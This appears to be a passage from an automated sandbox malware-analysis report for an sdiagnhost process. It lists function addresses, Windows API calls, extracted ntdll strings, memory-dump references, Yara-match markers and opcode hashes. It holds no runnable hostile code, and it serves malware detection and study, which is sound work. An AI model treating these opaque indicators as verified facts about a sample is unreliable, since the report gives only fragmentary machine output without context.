                                                                                                        • API String ID: 2186235152-0
                                                                                                        • Opcode ID: 5b14e8c8991db2ce8bb60d16524bd967674bc5ee151f6c0ef3eec1d62ddbf45d
                                                                                                        • Instruction ID: c479944bdf4e514f182a9058c10d6b0b82996b2e4297cf8b52c09c292a20e2eb
                                                                                                        • Opcode Fuzzy Hash: 5b14e8c8991db2ce8bb60d16524bd967674bc5ee151f6c0ef3eec1d62ddbf45d
                                                                                                        • Instruction Fuzzy Hash: D601DDB2210508BBCB54DF98DC81EEB37ADEF8C750F418209FA19A3241D670F8418BA4
                                                                                                        Function 001C46F3 Relevance: 1.5, APIs: 1, Instructions: 41libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 001C4772
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Load
                                                                                                        • String ID:
                                                                                                        • API String ID: 2234796835-0
                                                                                                        • Opcode ID: dc83588131f44574cd8422807d7d2f336c0821cf7bb5ccc9da02023e0697a3b3
                                                                                                        • Instruction ID: ee37d85e4c3c10ce1a11fab9c094aeeda05619d176f2a91bc7a8158f15bd1b9f
                                                                                                        • Opcode Fuzzy Hash: dc83588131f44574cd8422807d7d2f336c0821cf7bb5ccc9da02023e0697a3b3
                                                                                                        • Instruction Fuzzy Hash: 8DF0C27AE0424DABCF10CAA0DC81FE9B7B8DB65718F0042D9E9589A191E330AA45CB40
                                                                                                        Function 001C8287 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,001C1FA0,001D803E,?,001C1F68), ref: 001C82C1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode
                                                                                                        • String ID:
                                                                                                        • API String ID: 2340568224-0
                                                                                                        • Opcode ID: 9ad5c7cd2f8ef0fada5dab60bb431c19a32b899c5780426ef53cd69d5a340172
                                                                                                        • Instruction ID: 98d9d9e8aec63c65e1f4268cb1e3c4cb287f403d7adb433ab1225a9478ceb88b
                                                                                                        • Opcode Fuzzy Hash: 9ad5c7cd2f8ef0fada5dab60bb431c19a32b899c5780426ef53cd69d5a340172
                                                                                                        • Instruction Fuzzy Hash: 57F0E2776903043BF701DBB09C57F9A37589B90754F094BAAF848DB2C3DA29E71183A1
                                                                                                        Function 001B9D20 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 001B9D62
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2422867632-0
                                                                                                        • Opcode ID: 7d764a1fd8e6ceb11f9eeff8e4eefaca39d9d48bddce07a01f8b5cff2ca1e6bb
                                                                                                        • Instruction ID: f79c4c80312136f0cee847634c928bdaa6012b1ecf561ea6ea928e0a07c0e286
                                                                                                        • Opcode Fuzzy Hash: 7d764a1fd8e6ceb11f9eeff8e4eefaca39d9d48bddce07a01f8b5cff2ca1e6bb
                                                                                                        • Instruction Fuzzy Hash: 94F06D3338030436E63062EAAC03FD7B79CCB90B61F140426F70CEB2C1DA91B81146E5
                                                                                                        Function 001B9D1C Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 001B9D62
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2422867632-0
                                                                                                        • Opcode ID: ded18e58f46a882eee064b0db53704717c31d2dce733c10f1b86191560bc7bd7
                                                                                                        • Instruction ID: 106362f02fc80142b1328a72790b45b5c8dd9c7207a1a8f82ac992aadaf2f487
                                                                                                        • Opcode Fuzzy Hash: ded18e58f46a882eee064b0db53704717c31d2dce733c10f1b86191560bc7bd7
                                                                                                        • Instruction Fuzzy Hash: DDF0923738030432E23062D98C13FC77B9C8F95B60F140419F709AB2C1DE95B80186F5
                                                                                                        Function 001D96A0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(001C1CB6,?,001D577C,001C1CB6,?,001D577C,?,001C1CB6,001D56FE,00001000,?,00000000), ref: 001D96DC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: b20bf07ec4b29eb737d9fd0ab97a1927744358f06c43db782af747029bf9a184
                                                                                                        • Instruction ID: 974f04916750b8ff86aefb56aadde18b72068ad554ea110d93e849d11f09ce9f
                                                                                                        • Opcode Fuzzy Hash: b20bf07ec4b29eb737d9fd0ab97a1927744358f06c43db782af747029bf9a184
                                                                                                        • Instruction Fuzzy Hash: EDE06D722002047BC610EE58DC41F9B73ACEFC8720F404109F908A7241D770B81086B5
                                                                                                        Function 001D96F0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,553FF0FC,00000007,00000000,00000004,00000000,001C3FE9,000000F4), ref: 001D9729
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FreeHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 3298025750-0
                                                                                                        • Opcode ID: 71584d4d737ab25cda815ccf41897d3a747d03738cc4f5f1a56aefb8a9824e85
                                                                                                        • Instruction ID: c491bf93a9354fa419ce0af5c2751c7830ecb7b6b36f4623c961cbc3f2606420
                                                                                                        • Opcode Fuzzy Hash: 71584d4d737ab25cda815ccf41897d3a747d03738cc4f5f1a56aefb8a9824e85
                                                                                                        • Instruction Fuzzy Hash: BCE092722002047FD610EF58DC41EDB33ACEFC9710F404409F908A7242D774B81087B4
                                                                                                        Function 001C8490 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNELBASE(?), ref: 001C84BA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AttributesFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 3188754299-0
                                                                                                        • Opcode ID: 067228ad0dd4da4acf0515b25aaa4aea2d46f4fe0aba2920e4dcb7ac398a2a80
                                                                                                        • Instruction ID: 45c271b50935ae949e8b90c0097136842ee27600d8cf1ec5491f87b8388c6a02
                                                                                                        • Opcode Fuzzy Hash: 067228ad0dd4da4acf0515b25aaa4aea2d46f4fe0aba2920e4dcb7ac398a2a80
                                                                                                        • Instruction Fuzzy Hash: A9E0867625030927FA1867BC9C86F66339C8B58734F194A64B91CDB2C2EA74F9114154
                                                                                                        Function 001C10A8 Relevance: 1.5, APIs: 1, Instructions: 21threadwindowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(?,00000111), ref: 001C10B4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 1836367815-0
                                                                                                        • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                        • Instruction ID: 1c039950bd7412e8b6423b1b3d1805f5cdece3f84a16952b81b67c187aa536be
                                                                                                        • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                        • Instruction Fuzzy Hash: 6BD02277B4010C3AAA1245C4ACC1DFFB76CDB86AA6F004067FF08E2040E7219D020BB1
                                                                                                        Function 001C8290 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,001C1FA0,001D803E,?,001C1F68), ref: 001C82C1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode
                                                                                                        • String ID:
                                                                                                        • API String ID: 2340568224-0
                                                                                                        • Opcode ID: 129a9c37bd851f6f47cc411459ea1357c907075c7fa2f6302c3ba3c21280c732
                                                                                                        • Instruction ID: 06bb2a007a6bd60613b6e57d250fd43dff622b5ac808e936218c8da7d6b96f16
                                                                                                        • Opcode Fuzzy Hash: 129a9c37bd851f6f47cc411459ea1357c907075c7fa2f6302c3ba3c21280c732
                                                                                                        • Instruction Fuzzy Hash: 00D05E727903083BF500A7E59D07F66329C5B10764F0544A4F908E72C2EA61F5108565
                                                                                                        Function 04412C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: c13cefadcb73ee698c7043fcd6fc9f616da6defce8b80f223ccd501729074f85
                                                                                                        • Instruction ID: 2b3c3cd4e2754e21d76bcb34bdde4fdd884cfde8d3c8c58d0694f5b1e887bc23
                                                                                                        • Opcode Fuzzy Hash: c13cefadcb73ee698c7043fcd6fc9f616da6defce8b80f223ccd501729074f85
                                                                                                        • Instruction Fuzzy Hash: 21B04C719015D5D6EE11A760460961B79006BE0705F55C162D3025652A4768D191E175

                                                                                                        Non-executed Functions

                                                                                                        Function 0424DF11 Relevance: 57.7, Strings: 46, Instructions: 211COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899605553.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_4240000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                        • API String ID: 0-3754132690
                                                                                                        • Opcode ID: e7f911cb81a7b53bb765c442217429830efe473f80b05d0a724f9c23c46918c5
                                                                                                        • Instruction ID: 4e48fda76cb5e164b17b476a4110ee3c301e3c0fb712080421e4c4c8d0814d08
                                                                                                        • Opcode Fuzzy Hash: e7f911cb81a7b53bb765c442217429830efe473f80b05d0a724f9c23c46918c5
                                                                                                        • Instruction Fuzzy Hash: FD9150F04183948AC7158F58A0652AFFFB1EBC6305F15816DE7E6BB243C3BE89058B85
                                                                                                        Function 04412890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                        • API String ID: 48624451-2108815105
                                                                                                        • Opcode ID: b6c21375b5897b2835f7a07cbbf6d375ed02474ef1282235354d609a19da2abb
                                                                                                        • Instruction ID: 57e8a6ad06cf3b9a7d3fc3cd6d4bb60075f73c2dfbce16f46b41f4acc0a4f41f
                                                                                                        • Opcode Fuzzy Hash: b6c21375b5897b2835f7a07cbbf6d375ed02474ef1282235354d609a19da2abb
                                                                                                        • Instruction Fuzzy Hash: AE51E7B6B40516BFDF20DF9C998097FF7B8BB48204754826BE465E7641E274FE108BA0
                                                                                                        Function 04482410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                        • API String ID: 48624451-2108815105
                                                                                                        • Opcode ID: 82862d4ab5ced5be35564b1621a1088890987843d97fcfcda2ca004acdf6bf84
                                                                                                        • Instruction ID: ad8a59eb334c497eaa52896911fafc67e3e61b5b3e7fb8e500792fc65d74ca39
                                                                                                        • Opcode Fuzzy Hash: 82862d4ab5ced5be35564b1621a1088890987843d97fcfcda2ca004acdf6bf84
                                                                                                        • Instruction Fuzzy Hash: 3C51F3B5A40645ABDF30EE9CC99087FB7F8BF44204B40849FE896D3641E6B4FA408B60
                                                                                                        Function 04407630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04444725
                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04444655
                                                                                                        • ExecuteOptions, xrefs: 044446A0
                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 044446FC
                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 04444787
                                                                                                        • Execute=1, xrefs: 04444713
                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04444742
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                        • API String ID: 0-484625025
                                                                                                        • Opcode ID: 0dd3b3c9faec629e0a851d1d8a03d53a68eea605cc8f3ba52176d78fcf543ba3
                                                                                                        • Instruction ID: 3b6389c4fc4aed444558b49fbea922fc1066ae0c3c338f78f0d2365ce78d4f51
                                                                                                        • Opcode Fuzzy Hash: 0dd3b3c9faec629e0a851d1d8a03d53a68eea605cc8f3ba52176d78fcf543ba3
                                                                                                        • Instruction Fuzzy Hash: D5516D316002097AFF20AAA5EC45FBA77A8EF04354F0444BFE505A72D1EB70BE558F52
                                                                                                        Function 0441B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: +$-$0$0
                                                                                                        • API String ID: 1302938615-699404926
                                                                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                        • Instruction ID: 935792238107139aadfcc68fc9af59f18ca39f40b35deb1eb67df553fbcfb6dc
                                                                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                        • Instruction Fuzzy Hash: 4C81CF70E052898EEF248E68C8907FEBBB1EF55720F18451BE861A73B1C734B841CB61
                                                                                                        Function 044820E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: %%%u$[$]:%u
                                                                                                        • API String ID: 48624451-2819853543
                                                                                                        • Opcode ID: d8220b9d4f63fb95de3f4cae6ec2e07bef877fb4bc7e1308e003583b49ac4896
                                                                                                        • Instruction ID: 3d08c8e24ca7a52a71135e09e7add5bf20904d1450e1723b93406214239bdb95
                                                                                                        • Opcode Fuzzy Hash: d8220b9d4f63fb95de3f4cae6ec2e07bef877fb4bc7e1308e003583b49ac4896
                                                                                                        • Instruction Fuzzy Hash: 70218176A00119ABDF11EFA9D840AAFBBE8FF44744F54015BE905E3201E770E9118BA0
                                                                                                        Function 043FF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 044402E7
                                                                                                        • RTL: Re-Waiting, xrefs: 0444031E
                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 044402BD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                        • API String ID: 0-2474120054
                                                                                                        • Opcode ID: f864202d6dc87859c155a4b2f9191b6efaf0960f0875a7593d2689ece306f33a
                                                                                                        • Instruction ID: 140f6b44ade7751a76a7e4d25b23ce77ea09e6615615a36fcfe5d7de62fe8c76
                                                                                                        • Opcode Fuzzy Hash: f864202d6dc87859c155a4b2f9191b6efaf0960f0875a7593d2689ece306f33a
                                                                                                        • Instruction Fuzzy Hash: 6FE19070604B419FEB24CF28C844B2AB7E0BB88714F140A5EFA958B7E1DB75F955CB42
                                                                                                        Function 0440BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04447B7F
                                                                                                        • RTL: Re-Waiting, xrefs: 04447BAC
                                                                                                        • RTL: Resource at %p, xrefs: 04447B8E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                        • API String ID: 0-871070163
                                                                                                        • Opcode ID: c8f057dce6d9579cb34ba5de1273800474a8b0e6f36facf8b26391b70668a20a
                                                                                                        • Instruction ID: 9a7597f25bd46ead73dc87f18d2df823f35e999948405da88eeacb142b9ea927
                                                                                                        • Opcode Fuzzy Hash: c8f057dce6d9579cb34ba5de1273800474a8b0e6f36facf8b26391b70668a20a
                                                                                                        • Instruction Fuzzy Hash: EC41BF317007429FEF24DE259840B6BB7E5EB88714F004A2EF956DB781DB31F8168B96
                                                                                                        Function 0440B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0444728C
                                                                                                        Strings
                                                                                                        • RTL: Re-Waiting, xrefs: 044472C1
                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04447294
                                                                                                        • RTL: Resource at %p, xrefs: 044472A3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                        • API String ID: 885266447-605551621
                                                                                                        • Opcode ID: f603e38433622e16de6fd4a3b63b0e924e635197de9ee536c369a5c23a2134e4
                                                                                                        • Instruction ID: b7030e362796782eb91a231a308c4423acec60f5af28160b2da956251cc95ce2
                                                                                                        • Opcode Fuzzy Hash: f603e38433622e16de6fd4a3b63b0e924e635197de9ee536c369a5c23a2134e4
                                                                                                        • Instruction Fuzzy Hash: 58411031700242ABEF20DE65CC42B6AB7A5FB84714F10462BF955AB780DB31F8568BD5
                                                                                                        Function 04482300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: %%%u$]:%u
                                                                                                        • API String ID: 48624451-3050659472
                                                                                                        • Opcode ID: ebb20bdf5bbc35091bf985f1be91dde05042e6dc83ad6386c5a15d50d8b31589
